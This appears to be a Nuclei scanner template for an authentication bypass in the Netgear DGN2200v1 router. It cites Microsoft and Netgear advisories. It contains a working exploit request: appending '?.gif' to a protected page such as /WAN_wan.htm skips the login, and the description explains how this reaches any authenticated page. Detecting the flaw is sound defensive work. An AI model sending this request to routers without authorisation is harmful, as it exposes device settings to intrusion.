nuclei-templates/vulnerabilities/other/netgear-router-auth-bypass....

42 lines
1.5 KiB
YAML

id: netgear-router-auth-bypass
info:
name: Netgear DGN2200v1 Router Authentication Bypass
author: gy741
severity: high
description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”).
reference: |
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
tags: netgear,auth-bypass
requests:
- raw:
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>WAN Setup</title>"